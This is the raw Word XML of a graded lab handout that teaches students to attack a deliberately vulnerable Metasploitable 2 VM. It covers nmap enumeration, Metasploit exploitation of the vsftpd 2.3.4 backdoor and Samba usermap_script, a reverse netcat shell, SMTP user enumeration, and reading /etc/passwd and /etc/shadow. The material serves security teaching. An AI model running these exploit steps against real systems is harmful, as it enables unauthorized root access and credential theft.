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B2A4A" w:sz="6"/>
              <w:left w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6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160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:right w:val="single" w:color="1B2A4A" w:sz="6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before="10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Metasploitable 2 Setup &amp; Network Verification</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="A5B4FC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10 Marks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BEAFE" w:sz="4"/>
              <w:left w:val="single" w:color="2563EB" w:sz="12"/>
              <w:bottom w:val="single" w:color="DBEAFE" w:sz="4"/>
              <w:right w:val="single" w:color="DBEAFE" w:sz="4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DOWNLOAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="DBEAFE" w:sz="4"/>
              <w:left w:val="single" w:color="DBEAFE" w:sz="4"/>
              <w:bottom w:val="single" w:color="DBEAFE" w:sz="4"/>
              <w:right w:val="single" w:color="2563EB" w:sz="4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Download Metasploitable 2 from: https://sourceforge.net/projects/metasploitable/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Credentials: msfadmin / msfadmin  |  NEVER expose this VM to the internet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="8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Part A — VirtualBox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Extract the Metasploitable 2 .zip file. In VirtualBox, create a new VM: Type = Linux, Version = Other Linux (64-bit), Memory = 512 MB.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In the Hard Disk section, select 'Use an existing virtual hard disk file' and browse to the extracted .vmdk file.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In VM Settings → Network, set Adapter 1 to 'Host-only Adapter'. For Kali in VirtualBox, add a Host-Only Adapter as Adapter-2.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Power on the Metasploitable VM. Log in with msfadmin / msfadmin.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Run ip a (or ifconfig) on Metasploitable and record the eth0 IP address — this is your RHOST.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="8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Part B — VMware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Extract the .zip to reveal the .vmx file. Double-click the .vmx to import it into VMware Workstation. Select 'I moved it' if prompted.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7.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Both Kali and Metasploitable should be on the NAT adapter. Metasploitable's IP will be on eth0.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8.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Power on both VMs and log in to Metasploitable with msfadmin / msfadmin. Run ip a and record the IP.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Part C — Verify Connectivity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4"/>
              <w:left w:val="single" w:color="0F766E" w:sz="4"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="0F766E" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0F766E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From Kali terminal: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root@kali:~# ping -c 3 &lt;metasploitable-ip&gt;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Expected: 3 packets transmitted, 3 received, 0% packet loss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Also curl the Metasploitable web page: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root@kali:~# curl http://&lt;metasploitable-ip&gt;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single" w:color="0F766E" w:sz="4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Expected: HTML with 'Metasploitable2 – Linux' in title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9.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Ping Metasploitable from Kali. Record the RTT (round-trip time) shown in the ping statistics.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10.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Curl the HTTP service on port 80. Confirm the Metasploitable web page is accessible.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11.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Record both IP addresses: Kali IP (your LHOST) and Metasploitable IP (your RHOST) — you will use these throughout this lab.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FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="B45309" w:sz="12"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="FEF3C7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VIVA
QUESTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="B45309" w:sz="4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Why must Metasploitable NEVER be connected to the internet or a production network? What would happen if it were?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DE9FE" w:sz="4"/>
              <w:left w:val="single" w:color="7C3AED" w:sz="12"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="EDE9FE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SCREENSHOT
REQUIRED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:left w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="7C3AED" w:sz="4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Metasploitable 'ip a' output showing eth0 IP, and successful ping from Kali.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Label: 'Task1-Setup.png'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Screenshots — Task 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:spacing w:before="120"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486400" cy="2930316"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="100" name="Im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g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486400" cy="5833640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="101" name="Im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g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3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486399" cy="5302351"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="102" name="Im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g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530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B2A4A" w:sz="6"/>
              <w:left w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6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160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:right w:val="single" w:color="1B2A4A" w:sz="6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before="10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Initial Enumeration with Nmap</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="A5B4FC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10 Marks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="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Before launching any exploit, always enumerate the target to confirm open ports and service versions. This is the same reconnaissance methodology from Lab 03, now applied to Metasploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="8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Part A — Full Port Scan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4"/>
              <w:left w:val="single" w:color="0F766E" w:sz="4"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="0F766E" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0F766E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root@kali:~# nmap -p- -oN metasploitable.nmap &lt;metasploitable-ip&gt;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-p- : scan ALL 65535 ports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-oN : save output to file (Normal format)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single" w:color="0F766E" w:sz="4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This may take 2-4 minutes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12.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Run the full port scan and save the output. Record all open ports found (there should be 20+).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13.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Note the port numbers — identify which well-known services correspond to which port numbers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="8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Part B — Service &amp; Version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4"/>
              <w:left w:val="single" w:color="0F766E" w:sz="4"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="0F766E" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0F766E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root@kali:~# nmap -sC -sV -p21,22,23,25,53,80,139,445,512,513,514,1524,2049,3306,5432,6667,8180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    -oN metasploitable-full.nmap &lt;metasploitable-ip&gt;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-sC : run default NSE scripts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-sV : detect service versions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Key findings to note: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Port 21  → vsftpd 2.3.4        (backdoor — will exploit in Task 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Port 23  → telnetd             (weak credentials — Task 6)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Port 25  → Postfix smtpd       (user enumeration — Task 4)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Port 445 → Samba 3.0.20        (usermap_script RCE — Task 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single" w:color="0F766E" w:sz="4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Port 1524→ Metasploitable root shell  (bind shell — Task 7)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000"/>
        <w:gridCol w:w="2360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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25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21/tcp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22/tcp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23/tcp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25/tcp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80/tcp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445/tcp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1524/tcp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3306/tcp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14.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Run the targeted service version scan. Screenshot the full output.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15.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Complete the Port/Service/Version table in your lab report for every port found.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16.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Circle or highlight the services you will exploit in Tasks 3–7.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FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="B45309" w:sz="12"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="FEF3C7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VIVA
QUESTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="B45309" w:sz="4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What does the -sC flag add to an Nmap scan? How does knowing a version number help an attacker?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What is the significance of vsftpd 2.3.4 specifically?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DE9FE" w:sz="4"/>
              <w:left w:val="single" w:color="7C3AED" w:sz="12"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="EDE9FE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SCREENSHOT
REQUIRED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:left w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="7C3AED" w:sz="4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Full port scan results and -sC -sV version scan output with service versions visible.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Label: 'Task2-Nmap.png'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Screenshots — Task 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:spacing w:before="120"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486399" cy="5206838"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="103" name="Img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g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520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486400" cy="5094514"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="104" name="Img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g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9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486400" cy="5235840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="105" name="Img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g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B2A4A" w:sz="6"/>
              <w:left w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6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160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:right w:val="single" w:color="1B2A4A" w:sz="6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before="10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Exploiting vsftpd 2.3.4 Backdoor (Port 21)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="A5B4FC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">15 Marks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="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vsftpd 2.3.4 contains a deliberately planted backdoor introduced into the software supply chain in 2011. When a username containing ':)' (smiley face) is entered, the backdoor opens a root shell on port 6200. Metasploit automates this entirely.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FEE2E2" w:sz="4"/>
              <w:left w:val="single" w:color="DC2626" w:sz="12"/>
              <w:bottom w:val="single" w:color="FEE2E2" w:sz="4"/>
              <w:right w:val="single" w:color="FEE2E2" w:sz="4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CVE
REFERENCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="FEE2E2" w:sz="4"/>
              <w:left w:val="single" w:color="FEE2E2" w:sz="4"/>
              <w:bottom w:val="single" w:color="FEE2E2" w:sz="4"/>
              <w:right w:val="single" w:color="DC2626" w:sz="4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CVE-2011-2523  |  CVSS: 10.0 CRITICAL  |  Rank: Excellent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This is the same type of supply chain attack as the recent SolarWinds and XZ Utils incidents.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="8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▌ </w:t>
      </w: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Step-by-Step Exploitation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4"/>
              <w:left w:val="single" w:color="0F766E" w:sz="4"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="0F766E" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0F766E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Step 1: Launch msfconsole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root@kali:~# msfconsole -q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Step 2: Search for the vsftpd exploit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msf6 &gt; search vsftpd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Result: exploit/unix/ftp/vsftpd_234_backdoor  [Rank: excellent]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Step 3: Select the module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msf6 &gt; use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OR: use exploit/unix/ftp/vsftpd_234_backdoor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Step 4: Check options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msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; show options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Step 5: Set the target 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msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; set RHOSTS 192.168.56.102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Step 6: Run the exploit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msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; exploit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Expected success output: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DE68A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] 192.168.56.102:21 - Banner: 220 (vsFTPd 2.3.4)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DE68A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[+] 192.168.56.102:21 - Backdoor service has been spawned, handling...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DE68A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[+] 192.168.56.102:21 - UID: uid=0(root) gid=0(root)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DE68A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Found shell.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single" w:color="0F766E" w:sz="4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DE68A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Command shell session 1 opened (...)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17.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Launch msfconsole and run the search command for vsftpd. Screenshot the search results showing the module name and rank.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18.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Select the module, view its options, and set RHOSTS to your Metasploitable IP.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19.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Run the exploit. Screenshot the full output including the '[+] UID: uid=0(root)' line.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20.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In the opened shell, run whoami, hostname, id, and uname -a. Record all outputs.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21.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Run cat /etc/passwd to list all system users. Note any interesting accounts.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22.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Exit the shell (exit or CTRL+C) when done.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FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="B45309" w:sz="12"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="FEF3C7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VIVA
QUESTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="B45309" w:sz="4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What is a supply chain attack? Why does vsftpd 2.3.4 backdoor open port 6200 specifically?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What does uid=0 confirm?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DE9FE" w:sz="4"/>
              <w:left w:val="single" w:color="7C3AED" w:sz="12"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="EDE9FE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SCREENSHOT
REQUIRED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:left w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="7C3AED" w:sz="4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search vsftpd output, show options, exploit success with uid=0(root), and whoami/id output in shell.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Label: 'Task3-vsftpd.png'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Screenshots — Task 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:spacing w:before="120"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486400" cy="3257334"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="106" name="Img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g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486400" cy="2019833"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="107" name="Img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g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486400" cy="2360346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="108" name="Img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g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B2A4A" w:sz="6"/>
              <w:left w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6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160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:right w:val="single" w:color="1B2A4A" w:sz="6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before="10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SMTP User Enumeration (Port 25)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="A5B4FC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10 Marks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="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The SMTP VRFY and EXPN commands can be abused to confirm whether a username exists on the system. Metasploit's smtp_enum auxiliary module automates this, querying a wordlist of common usernames against the mail server. Valid usernames can then be used for brute-force attacks.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4"/>
              <w:left w:val="single" w:color="0F766E" w:sz="4"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="0F766E" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0F766E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Step 1: Confirm SMTP is running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root@kali:~# nmap -sC -sV -p25 192.168.56.102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Expected: Postfix smtpd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Step 2: In msfconsole, search for smtp_enum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msf6 &gt; search smtp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Result index 1: auxiliary/scanner/smtp/smtp_enum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Step 3: Select the auxiliary module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msf6 &gt; use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OR: use auxiliary/scanner/smtp/smtp_enum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Step 4: Check options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msf6 auxiliary(scanner/smtp/smtp_enum) &gt; show options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Note: USER_FILE → /usr/share/metasploit-framework/data/wordlists/unix_users.txt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Step 5: Configure and run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msf6 auxiliary(scanner/smtp/smtp_enum) &gt; set RHOSTS 192.168.56.102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msf6 auxiliary(scanner/smtp/smtp_enum) &gt; set VERBOSE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msf6 auxiliary(scanner/smtp/smtp_enum) &gt; exploit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DE68A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[+] Found user: backup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single" w:color="0F766E" w:sz="4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DE68A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[+] Found user: bin   ...(many valid users)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23.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Run the smtp_enum module against the target. Let it complete fully.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24.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Record the list of all valid usernames found (prefixed with [+] Found user:).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25.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Count the total number of valid users discovered. Note which privileged accounts were found (root, daemon, www-data, etc.).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26.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Explain in your report: why would discovering valid usernames be dangerous in a real-world attack? What could an attacker do with this list?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FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="B45309" w:sz="12"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="FEF3C7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VIVA
QUESTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="B45309" w:sz="4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What is the difference between VRFY and EXPN SMTP commands? Why do modern mail servers disable these?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What is the purpose of an auxiliary module vs an exploit module?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DE9FE" w:sz="4"/>
              <w:left w:val="single" w:color="7C3AED" w:sz="12"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="EDE9FE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SCREENSHOT
REQUIRED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:left w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="7C3AED" w:sz="4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smtp_enum module options, exploit run output showing all [+] Found user lines.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Label: 'Task4-SMTP.png'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Screenshots — Task 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:spacing w:before="120"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486400" cy="585216"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="109" name="Img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g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486400" cy="3859019"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="110" name="Img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g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486400" cy="1784648"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="111" name="Img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g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B2A4A" w:sz="6"/>
              <w:left w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6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160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:right w:val="single" w:color="1B2A4A" w:sz="6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before="10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Exploiting Samba usermap_script (Port 445)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="A5B4FC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">15 Marks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="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Samba 3.0.20-Debian contains a critical command injection vulnerability in its username mapping script. When the 'username map script' option is enabled and a username containing shell metacharacters is sent, it executes arbitrary commands as root. This is one of the most commonly demonstrated exploits in penetration testing courses.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FEE2E2" w:sz="4"/>
              <w:left w:val="single" w:color="DC2626" w:sz="12"/>
              <w:bottom w:val="single" w:color="FEE2E2" w:sz="4"/>
              <w:right w:val="single" w:color="FEE2E2" w:sz="4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CVE
REFERENCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="FEE2E2" w:sz="4"/>
              <w:left w:val="single" w:color="FEE2E2" w:sz="4"/>
              <w:bottom w:val="single" w:color="FEE2E2" w:sz="4"/>
              <w:right w:val="single" w:color="DC2626" w:sz="4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CVE-2007-2447  |  CVSS: 10.0 CRITICAL  |  Rank: Excellent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Default payload: cmd/unix/reverse_netcat (reverse shell)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4"/>
              <w:left w:val="single" w:color="0F766E" w:sz="4"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="0F766E" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0F766E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Step 1: Confirm Samba version (from Task 2 Nmap output)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Should show: Samba 3.0.20-Debian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Step 2: In msfconsole, search for Samba exploits with excellent rank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msf6 &gt; search samba rank:excellent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Find: exploit/multi/samba/usermap_script (index 4 or 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Step 3: Select and view options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msf6 &gt; use exploit/multi/samba/usermap_script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msf6 exploit(multi/samba/usermap_script) &gt; show options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Step 4: Find your Kali LHOST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root@kali:~# ip a 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Look for eth1 IP in the same subnet as Metasploitable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Step 5: Set variables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msf6 exploit(multi/samba/usermap_script) &gt; set RHOSTS 192.168.56.102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msf6 exploit(multi/samba/usermap_script) &gt; set LHOST eth1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Step 6: Exploit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msf6 exploit(multi/samba/usermap_script) &gt; exploit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DE68A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.56.101:4444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FDE68A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Command shell session 1 opened (...)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whoami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root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cat /etc/hostname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single" w:color="0F766E" w:sz="4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metasploitable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27.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Search for Samba exploits with rank:excellent. Screenshot the results table showing all excellent-ranked modules.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28.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Select exploit/multi/samba/usermap_script. Run show options and identify which variables are required.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29.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Find your Kali LHOST by running ip a s and identifying the interface in the same subnet as Metasploitable.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30.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Set RHOSTS and LHOST then run the exploit. Screenshot the full output including the session opened line.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31.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In the reverse shell, run whoami, ls -la /, cat /etc/hostname, and uname -a. Screenshot all outputs.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32.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Run cat /etc/shadow (if accessible). Record whether you can read the hashed passwords.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FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="B45309" w:sz="12"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="FEF3C7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VIVA
QUESTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:left w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:bottom w:val="single" w:color="FEF3C7" w:sz="4"/>
              <w:right w:val="single" w:color="B45309" w:sz="4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What is a command injection vulnerability? Why does this Samba exploit result in a root shell rather than a user shell?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What is the difference between 'use 4' and 'use exploit/multi/samba/usermap_script'?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DE9FE" w:sz="4"/>
              <w:left w:val="single" w:color="7C3AED" w:sz="12"/>
              <w:bottom w:val="single" w:color="EDE9FE" w:sz="4"/>
              <w:right w:val="single" w:color="EDE9FE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SCREENSHOT
REQUIRED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="EDE9FE" w:sz="4"/>
